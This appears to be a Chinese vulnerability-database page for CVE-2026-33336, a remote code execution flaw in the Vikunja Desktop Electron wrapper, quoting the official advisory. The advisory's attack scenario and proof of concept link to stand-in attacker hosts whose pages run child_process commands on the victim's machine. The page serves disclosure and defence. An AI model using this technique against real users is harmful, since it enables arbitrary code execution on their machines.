目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2026-33336— Vikunja 代码注入漏洞

一分钟漏洞结论

影响对象
go-vikunja vikunja
利用判断
尚无明确在野利用证据,仍需结合暴露面评估
建议动作
优先检查厂商安全公告和参考链接中的修复版本;无法立即升级时,限制受影响服务暴露并加强监测。

Vikunja是Vikunja开源的一个待办事项应用程序。 Vikunja 0.21.0至2.2.0之前版本存在代码注入漏洞,该漏洞源于Vikunja Desktop Electron包装器在主BrowserWindow中启用了nodeIntegration且未限制同窗口导航,可能导致攻击者通过用户生成内容中的链接使BrowserWindow导航至攻击者控制的源,进而执行具有完整Node.js访问权限的JavaScript,最终在受害者机器上执行任意代码。

AI 预测 9.8 利用难度: 较易 EPSS 0.92% · P59
获取后续新漏洞提醒 登录后订阅

一、 漏洞 CVE-2026-33336 基础信息

漏洞信息

对漏洞内容有疑问?看看神龙的深度分析是否有帮助!
查看神龙十问 ↗

尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。

Vulnerability Title
Vikunja Desktop vulnerable to Remote Code Execution via same-window navigation
来源: CVE Program / CVE List V5
Vulnerability Description
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue. ## Root cause Two misconfigurations combine to create this vulnerability: 1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.). 2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by: - `<a href="https://...">` links (without `target="_blank"`) - `window.location` assignments - HTTP redirects - `<meta http-equiv="refresh">` tags ## Attack scenario 1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project). 2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>` 3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output. 4. The victim uses Vikunja Desktop and clicks the link. 5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process. 6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');` 7. Arbitrary commands execute as the victim's OS user. ## Impact Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient. ## Proof of concept 1. Set up a Vikunja instance with two users sharing a project. 2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>` 3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>` 4. As the victim, open the project in Vikunja Desktop and click the link. 5. calc.exe (or any other command) executes on the victim's machine. ## Credits This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
来源: CVE Program / CVE List V5
CVSS Information
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
来源: CVE Program / CVE List V5
Vulnerability Type
对生成代码的控制不恰当(代码注入)
来源: CVE Program / CVE List V5
Vulnerability Title
Vikunja 代码注入漏洞
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Description
Vikunja是Vikunja开源的一个待办事项应用程序。 Vikunja 0.21.0至2.2.0之前版本存在代码注入漏洞,该漏洞源于Vikunja Desktop Electron包装器在主BrowserWindow中启用了nodeIntegration且未限制同窗口导航,可能导致攻击者通过用户生成内容中的链接使BrowserWindow导航至攻击者控制的源,进而执行具有完整Node.js访问权限的JavaScript,最终在受害者机器上执行任意代码。
来源: 中国国家信息安全漏洞库 CNNVD
CVSS Information
N/A
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Type
N/A
来源: 中国国家信息安全漏洞库 CNNVD

受影响产品

厂商 产品 影响版本 CPE 订阅
go-vikunja vikunja >= 0.21.0, < 2.2.0 -

二、漏洞 CVE-2026-33336 的公开POC

# POC 描述 源链接 神龙链接
AI 生成 POC 高级

未找到公开 POC。

登录以生成 AI POC

三、漏洞 CVE-2026-33336 的情报信息

请登录查看更多情报信息。

CVE-2026-33336 厂商安全公告 (1)

CVE-2026-33336 厂商页面 (1)

同批安全公告 · go-vikunja · 2026-03-24 · 共 16 条

CVE-2026-33316 8.1 HIGH Vikunja 安全漏洞
CVE-2026-33678 8.1 HIGH Vikunja 安全漏洞
CVE-2026-33680 7.5 HIGH Vikunja 授权问题漏洞
CVE-2026-33474 6.5 MEDIUM Vikunja 资源管理错误漏洞
CVE-2026-33677 6.5 MEDIUM Vikunja 信息泄露漏洞
CVE-2026-33676 6.5 MEDIUM Vikunja 安全漏洞
CVE-2026-33675 6.4 MEDIUM Vikunja 安全漏洞
CVE-2026-33679 6.4 MEDIUM Vikunja 代码问题漏洞
CVE-2026-33473 5.7 MEDIUM Vikunja 授权问题漏洞
CVE-2026-33315 Vikunja 安全漏洞
CVE-2026-33313 Vikunja 安全漏洞
CVE-2026-33335 Vikunja 安全漏洞
CVE-2026-33334 Vikunja 安全漏洞
CVE-2026-33668 Vikunja 安全漏洞
CVE-2026-33700 Vikunja 安全漏洞

IV. Related Vulnerabilities

V. Comments for CVE-2026-33336

暂无评论


发表评论